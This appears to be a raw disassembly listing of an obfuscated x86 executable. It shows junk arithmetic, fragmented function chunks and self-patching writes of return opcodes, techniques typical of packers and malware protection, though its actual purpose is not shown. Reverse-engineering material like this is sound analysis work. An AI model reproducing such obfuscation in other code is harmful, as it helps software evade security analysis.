; FUNCTION CHUNK AT 0043F3EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443463 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044F411 SIZE 00000007 BYTES

		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_447D03
		jmp	loc_43F354
sub_43F13A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446966

loc_43F149:				; CODE XREF: sub_446966:loc_44F8E8j
					; DATA XREF: sub_44432F+438Co
		push	ecx
		push	0C45832CBh
		xchg	edx, [esp+0]
		mov	ecx, edx
		pop	edx
		and	ecx, 328FE044h
		sub	ecx, 423EC468h
		and	ecx, 1ABF1F4h
		jmp	loc_43FC7A
; END OF FUNCTION CHUNK	FOR sub_446966
; ---------------------------------------------------------------------------

loc_43F16C:				; CODE XREF: hvvrg7ie:00439C67j
		jnp	loc_45634E
		mov	ebp, edx
		jmp	loc_43B800
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43F179:				; CODE XREF: sub_44191F:loc_4530F2j
		mov	eax, [esp+0]
		push	edx
		call	sub_44CEC8
		push	874570C5h
		jmp	loc_447301
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447793

loc_43F18C:				; CODE XREF: sub_447793+10j
					; hvvrg7ie:loc_450240j
		and	esi, 969E8074h
		sub	esi, 0D0FBF31h
		add	esi, 0FACB8105h
		xchg	esi, [esp+0]
		jmp	nullsub_3
; END OF FUNCTION CHUNK	FOR sub_447793
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_43F1A6:				; CODE XREF: sub_44388C-1873j
		cmp	al, 0A4h
		jz	loc_45764C
		jmp	loc_45136E
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------

loc_43F1B3:				; CODE XREF: hvvrg7ie:0044971Dj
		mov	eax, 1C5E06BAh
		push	ebx
		push	7252E695h
		pop	ebx
		sub	ebx, 0ED0D6BA0h
		and	ebx, 746BD0FBh
		xor	ebx, 32F19C25h
		and	ebx, 0D696F5BFh
		jmp	loc_4457F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43F1DC:				; CODE XREF: sub_450434-16634j
					; sub_44BCAE-AF4Ej
		mov	ebp, [ebx]
		and	edi, 8331BE7Ah
		jmp	loc_439017
; ---------------------------------------------------------------------------

loc_43F1E9:				; CODE XREF: sub_450434:loc_43B984j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_43F0C9
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_43F1F5:				; CODE XREF: hvvrg7ie:00457EE1j
		jz	loc_441C7C
		jmp	loc_457E98
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_43F200:				; CODE XREF: hvvrg7ie:0043CE99j
					; sub_45A7E8:loc_44998Dj
		add	edi, ebp
		pushf
		jmp	loc_44A7C4
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; ---------------------------------------------------------------------------

loc_43F208:				; CODE XREF: hvvrg7ie:00445029j
		xor	eax, ds:4000F5h
		or	eax, 3B2AF52Ah
		add	eax, 0FB3468C5h
		add	eax, ebp
		add	eax, 44CFA1F1h
		jmp	loc_440B49

; =============== S U B	R O U T	I N E =======================================



sub_43F227	proc near		; CODE XREF: sub_44D2F8+7579p
					; hvvrg7ie:00456868j

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 004395B8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00439833 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439AFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439EB0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043A34B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043A589 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043AD63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B1BD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BBB2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BCAC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043BE72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D10A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D2AE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043D6E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E014 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E057 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E845 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043EA71 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043EE58 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0043F329 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0044006F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440233 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004410AA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004415B5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044194C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00441F66 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004423FA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442A24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044307E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004431AB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004436BA SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004459AC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004459FA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00445B75 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004464B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446F7A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447A01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447AAE SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447D27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447D51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448DA5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448FD1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044930B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00449375 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004496A5 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004498C5 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00449A82 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00449DD4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449FA4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A96E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044AA6B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AEDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B1B4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044B28B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B539 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B6E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CCFE SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044CF47 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EA7C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044EBC3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044F509 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044F926 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044FD26 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044FF28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045009F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00450203 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045032E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004503F1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450984 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00450BA4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00450FA0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451088 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451453 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451E37 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452105 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452179 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004521CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004525B7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004525D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045266F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004529AB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453119 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453249 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453434 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004538C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004539CF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453FCA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045408D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00454334 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00454EE5 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004550AA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00455D48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D6A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455F91 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045639C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004566EC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045698F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456FD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457503 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457F8B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458BDD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045A524 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A569 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045B1A7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045B1F5 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		cmp	dword ptr [ebp-4], 4
		jnz	loc_450BAA
		jmp	loc_4566EC
sub_43F227	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459E78

loc_43F23A:				; CODE XREF: sub_459E78:loc_44A1E7j
		push	offset loc_45205D
		jmp	nullsub_386
; END OF FUNCTION CHUNK	FOR sub_459E78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E56

loc_43F244:				; CODE XREF: sub_443E56:loc_4461D8j
		call	sub_458A13
		mov	ds:off_41D1F0, eax
		lea	eax, sub_443E56
		mov	byte ptr [eax],	0C3h
		jmp	loc_445400
; END OF FUNCTION CHUNK	FOR sub_443E56

; =============== S U B	R O U T	I N E =======================================



sub_43F25D	proc near		; CODE XREF: sub_419430+B1p
					; sub_43F25D+5j
					; DATA XREF: ...
		call	sub_43F272
		jmp	ds:off_41D1F4
sub_43F25D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_43F268:				; CODE XREF: sub_454099-A0D0j
		jmp	loc_440764
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_43F26D:				; CODE XREF: hvvrg7ie:004481A2j
		jmp	loc_43B920

; =============== S U B	R O U T	I N E =======================================



sub_43F272	proc near		; CODE XREF: sub_44C5D0-129ADj
					; sub_43F25Dp ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D5D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447986 SIZE 0000000E BYTES

		jno	loc_447986
		xchg	esi, [esp+0]
		jmp	loc_45AECF
sub_43F272	endp

; ---------------------------------------------------------------------------

loc_43F280:				; CODE XREF: hvvrg7ie:0043E00Fj
		jnp	loc_441364
		ror	ebp, 0Dh
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_43F289:				; CODE XREF: sub_44E3B3:loc_459A44j
		jmp	sub_452637
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_43F28E:				; CODE XREF: sub_451E6D:loc_440514j
		jnz	loc_454CF9
		jmp	loc_43D8A1
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
		mov	eax, 72B18749h
		push	ecx
		push	0F61DBE7h
		pop	ecx
		add	ecx, ds:4000F8h
		and	ecx, 59658E1Ch
		add	ecx, 0E71F96CBh
		xchg	ecx, [esp]
		jmp	loc_451893
; ---------------------------------------------------------------------------
		add	edx, 70405445h
		jmp	loc_44A87C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4576E4

loc_43F2CA:				; CODE XREF: sub_4576E4+8j
		xchg	esi, [esp+0]
		pop	esi
		xchg	eax, [esp-4+arg_0]
		mov	edx, eax
		push	offset loc_454BC3
		jmp	loc_44A2AA
; END OF FUNCTION CHUNK	FOR sub_4576E4
; ---------------------------------------------------------------------------
		pop	edx
		call	sub_4437CA

loc_43F2E3:				; CODE XREF: hvvrg7ie:00457425j
		jmp	nullsub_500
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C562

loc_43F2E8:				; CODE XREF: sub_43C562+13A1Bj
		jmp	nullsub_319
; END OF FUNCTION CHUNK	FOR sub_43C562
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_43F2ED:				; CODE XREF: sub_455B9C-10AE4j
		jmp	loc_4460DB
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481B6

loc_43F2F2:				; CODE XREF: sub_4481B6+Cj
		jz	loc_446988
		jmp	loc_453A6A
; END OF FUNCTION CHUNK	FOR sub_4481B6
; ---------------------------------------------------------------------------

loc_43F2FD:				; DATA XREF: sub_43C421:loc_444567o
		mov	eax, [ebp-14h]
		mov	eax, [eax+18h]
		call	sub_4594D6
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_43F308:				; CODE XREF: sub_43D16B+1844Bj
					; sub_43D16B:loc_45A250j
		lea	edx, [ebp-14h]
		push	0F7BC10D4h
		pop	eax
		xor	eax, 710AEF37h
		add	eax, 798E8D75h
		push	eax
		pushf
		push	4B488314h
		jmp	loc_43A962
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43F329:				; CODE XREF: sub_43F227+10B10j
					; sub_43F227:loc_456FD6j
		push	0C2031B52h
		pop	eax
		and	eax, 0DE516A76h
		add	eax, 3393F709h
		sub	eax, 98ABF1E8h
		xor	eax, 0DA1FDD02h
		add	eax, ebp
		add	eax, 79092B20h
		jmp	loc_4459FA
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F13A

loc_43F354:				; CODE XREF: sub_43F13A+Aj
		jnz	loc_443465
		jmp	loc_44F411
; END OF FUNCTION CHUNK	FOR sub_43F13A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43F35F:				; CODE XREF: sub_4512A0:loc_43C08Fj
					; sub_450434-107C5j
		jl	loc_459387
		pop	edx
		shr	edx, 9
		jp	loc_4403F6
		jmp	loc_43A576
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_43F374:				; CODE XREF: hvvrg7ie:004398B2j
					; hvvrg7ie:00447221j
		sub	esi, 0A564D965h
		or	esi, 0B046E23Dh

loc_43F380:				; CODE XREF: hvvrg7ie:00447C0Cj
		add	esi, 9464E2Ah
		xchg	esi, [esp]
		jmp	loc_45A0D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_43F38E:				; CODE XREF: sub_445CCD:loc_4569C1j
		add	eax, ebp
		add	eax, 0DCC84008h
		call	sub_44BFF5

loc_43F39B:				; CODE XREF: sub_4424A6:loc_43B867j
		jz	loc_44D92D
		jmp	loc_44A548
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB90

loc_43F3A6:				; CODE XREF: sub_44AB90:loc_455411j
		sub	edx, 0DBB6F42Fh
		or	edx, 0E7514F35h
		xor	edx, 7AE443E2h
		call	sub_446A16
		push	eax
		ror	eax, 1Ah
		jmp	loc_45255B
; END OF FUNCTION CHUNK	FOR sub_44AB90
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_111. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_43F3C7:				; CODE XREF: sub_451F50-AF57j
					; sub_458095:loc_457855j
		mov	eax, [ebp-0Ch]
		call	sub_451F50
; END OF FUNCTION CHUNK	FOR sub_458095
; START	OF FUNCTION CHUNK FOR sub_441390

loc_43F3CF:				; CODE XREF: sub_441390+3j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_441390
; ---------------------------------------------------------------------------

loc_43F3D4:				; CODE XREF: hvvrg7ie:00457148j
		sbb	esi, 0BAE4B9C7h

loc_43F3DA:				; CODE XREF: hvvrg7ie:0045A05Aj
		and	ebx, 0FAA826C9h
		add	ebx, 9045613Dh
		xchg	ebx, [esp]
		jmp	loc_446BE6
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F13A

loc_43F3EF:				; CODE XREF: sub_43F13A+4330j
		jmp	nullsub_499
; END OF FUNCTION CHUNK	FOR sub_43F13A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C61

loc_43F3F4:				; CODE XREF: sub_440C61+1Cj
		jmp	loc_4544C7
; END OF FUNCTION CHUNK	FOR sub_440C61
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_321. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_43F3FA:				; CODE XREF: sub_444B29+1239Aj
		jmp	loc_454AFB
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43F3FF:				; CODE XREF: sub_450434-357Ej
		jmp	loc_4521C9
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_43F404:				; CODE XREF: hvvrg7ie:004407A1j
		call	sub_439549
		test	al, al
		jz	nullsub_321
		jmp	loc_44A832
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447BB7

loc_43F416:				; CODE XREF: sub_447BB7:loc_456C16j
		pop	edi

loc_43F417:				; CODE XREF: hvvrg7ie:loc_441C24j
		mov	edx, [esp-4+arg_0]
		push	edi
		mov	edi, eax
		xchg	edi, [esp+0]
		mov	eax, edx
		nop
		jmp	loc_4489BE
; END OF FUNCTION CHUNK	FOR sub_447BB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A003

loc_43F428:				; CODE XREF: sub_45A003-1A701j
		add	edi, 5988A26Eh
		xchg	edi, [esp+0]
		jmp	loc_4572CC
; END OF FUNCTION CHUNK	FOR sub_45A003
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_43F436:				; CODE XREF: sub_452B83:loc_459F46j
		xchg	edx, [esp+0]
		mov	eax, edx
		pop	edx
		sub	eax, 66031B8Bh
		jmp	loc_448D09
; END OF FUNCTION CHUNK	FOR sub_452B83

; =============== S U B	R O U T	I N E =======================================



sub_43F447	proc near		; DATA XREF: hvvrg7ie:00453C0Ao

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044CC8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FD7E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450F41 SIZE 00000005 BYTES

		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+4+var_4]
		call	sub_45AB9D
		mov	eax, 0D1CB0F56h
		call	sub_450C5A
		jmp	loc_450F41
sub_43F447	endp

; ---------------------------------------------------------------------------

loc_43F461:				; CODE XREF: hvvrg7ie:004484B4j
		cmp	esi, 0D73556D2h
		jmp	loc_457FA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_43F46C:				; CODE XREF: sub_44388C+66E6j
		jl	loc_43AD25

loc_43F472:				; CODE XREF: sub_44388C:loc_43C031j
		push	4E9F135Bh
		pop	eax
		add	eax, 88F2714Fh
		jnb	loc_454C32
		rol	ebp, 1Ch
		jmp	loc_454C30
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_43F48C:				; CODE XREF: sub_456CD4:loc_4496A0j
		mov	[esi], eax
		pop	esi
		pushf
		push	3C2AF48Eh
		xchg	ecx, [esp+0]
		mov	eax, ecx
		jmp	loc_4513D1
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------

loc_43F49F:				; CODE XREF: hvvrg7ie:loc_458DA8j
		jz	loc_44AC62
; START	OF FUNCTION CHUNK FOR sub_4446E9

loc_43F4A5:				; CODE XREF: sub_4446E9+15B7Cj
		jmp	loc_45B08A
; END OF FUNCTION CHUNK	FOR sub_4446E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_43F4AA:				; CODE XREF: sub_44BCAE+459j
		jmp	loc_447A3C
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
		jnp	loc_45B264
		test	edi, ebx
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_43F4B7:				; CODE XREF: sub_446D8D:loc_4594A7j
		jmp	loc_442F38
; END OF FUNCTION CHUNK	FOR sub_446D8D

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43F4BC	proc near		; DATA XREF: sub_4506F9o
		push	ebp
		mov	ebp, esp
		jnb	sub_455ADC
		call	sub_44191F

loc_43F4CA:				; CODE XREF: sub_458374-1B8ACj
		jmp	nullsub_117
sub_43F4BC	endp

; ---------------------------------------------------------------------------

loc_43F4CF:				; CODE XREF: hvvrg7ie:loc_450DC3j
		add	eax, 2AF8221Fh
		rol	eax, 12h
		cmp	eax, 9803ECD0h
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_43F4DE:				; CODE XREF: sub_44B1C6:loc_44781Cj
		jmp	loc_4424D3
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_43F4E3:				; CODE XREF: sub_4466CE+EB36j
		jz	loc_450123

loc_43F4E9:				; CODE XREF: hvvrg7ie:00450831j
		jmp	loc_45475C
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_43F4EE:				; CODE XREF: sub_45B048-15138j
		jmp	loc_441AD3
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
		cdq
		or	ebx, edx
		sub	edx, 0F17FA506h
		add	esi, ecx
		jmp	loc_450123
; ---------------------------------------------------------------------------

locret_43F503:				; CODE XREF: hvvrg7ie:loc_43BE2Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4563DC

loc_43F504:				; CODE XREF: sub_4563DC+256Fj
		jmp	loc_440EF1
; END OF FUNCTION CHUNK	FOR sub_4563DC
; ---------------------------------------------------------------------------

loc_43F509:				; CODE XREF: hvvrg7ie:loc_43ECA5j
		mov	byte ptr [eax],	0C3h
		jmp	loc_444E3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4192DB

loc_43F511:				; CODE XREF: sub_4192DB+Dj
					; sub_4192DB+2623Bj
					; DATA XREF: ...
		call	sub_43F521
		jmp	ds:off_41D1FC
; END OF FUNCTION CHUNK	FOR sub_4192DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B036

loc_43F51C:				; CODE XREF: sub_45B036+9j
		jmp	loc_450607
; END OF FUNCTION CHUNK	FOR sub_45B036

; =============== S U B	R O U T	I N E =======================================



sub_43F521	proc near		; CODE XREF: sub_4192DB:loc_43F511p
					; hvvrg7ie:0044CF0Ej ...
		call	sub_439990

loc_43F526:				; CODE XREF: sub_43C0DE+C3C9j
		jmp	sub_446A16
sub_43F521	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D37

loc_43F52B:				; CODE XREF: sub_454D37-139F3j
		jmp	loc_459626
; END OF FUNCTION CHUNK	FOR sub_454D37
; ---------------------------------------------------------------------------
		jb	loc_45248B
		jmp	sub_452585
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_63. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A2A5

loc_43F53C:				; CODE XREF: sub_43A2A5+969Cj
		jmp	nullsub_546
; END OF FUNCTION CHUNK	FOR sub_43A2A5
; ---------------------------------------------------------------------------

loc_43F541:				; CODE XREF: hvvrg7ie:0043B66Dj
		jmp	loc_44E196
; ---------------------------------------------------------------------------
		push	0C87FB451h
		pop	edx
		rol	edx, 9
		or	edx, 47D45366h
		sub	edx, 5B529883h
		jmp	loc_44A19E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_43F560:				; CODE XREF: sub_43C811:loc_445B41j
		pushf
		push	0AD333993h
		pop	eax
		and	eax, 0B2FDB86Bh
		sub	eax, 0F4450F90h
		xor	eax, 6C4639B9h
		add	eax, ebp
		jmp	loc_43EA05
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_43F580:				; CODE XREF: sub_43B3BE+943Aj
		jnp	loc_443C35

loc_43F586:				; CODE XREF: sub_43B3BE:loc_4492C7j
		xor	eax, eax
		push	edi
		push	80CDFCFAh
		jmp	loc_459283
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_43F593:				; CODE XREF: sub_442FD1-8986j
		jo	loc_43F79D
		mov	ebp, ecx
		test	eax, ebp
		jmp	loc_441ECA
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499A7

loc_43F5A2:				; CODE XREF: sub_4499A7:loc_45723Bj
		add	edx, 24AEF996h
		xchg	edx, [esp+0]
		jmp	sub_452E74
; END OF FUNCTION CHUNK	FOR sub_4499A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_43F5B0:				; CODE XREF: sub_43A839:loc_44A280j
					; sub_43A839+FA5Fj
		and	eax, 7C3DF26Fh
		cmp	eax, 2230CF7Bh
		jmp	loc_452183
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450C5A

loc_43F5C1:				; CODE XREF: sub_450C5A+14j
		jz	loc_443B59
		jmp	loc_450634
; END OF FUNCTION CHUNK	FOR sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6BE

loc_43F5CC:				; CODE XREF: sub_44C6BE+AAB0j
		pop	eax
		and	eax, 0F04B100Bh
		rol	eax, 0Ch

loc_43F5D6:				; CODE XREF: hvvrg7ie:loc_4466E9j
		xor	eax, 61A006C1h
		jmp	loc_44EB49
; END OF FUNCTION CHUNK	FOR sub_44C6BE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_88. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	ecx
		push	630121A3h
		pop	ecx
		sub	ecx, 384CBABh
		jmp	loc_446713
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468C2

loc_43F5F4:				; CODE XREF: sub_4468C2:loc_45919Aj
		sbb	edx, ecx
		and	edi, ebp
; END OF FUNCTION CHUNK	FOR sub_4468C2
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_43F5F8:				; CODE XREF: sub_43E063+F945j
		and	edx, 0E2CE98Dh
		add	edx, 0F6257417h
		xchg	edx, [esp-8+arg_4]
		jmp	loc_44A870
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
		jb	loc_451CF1
		mov	[ecx], edx
		jmp	sub_45038B
; ---------------------------------------------------------------------------

loc_43F619:				; DATA XREF: sub_4554E8-2986o
		add	eax, 780DABF6h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43FC0D
		jmp	loc_43EF71
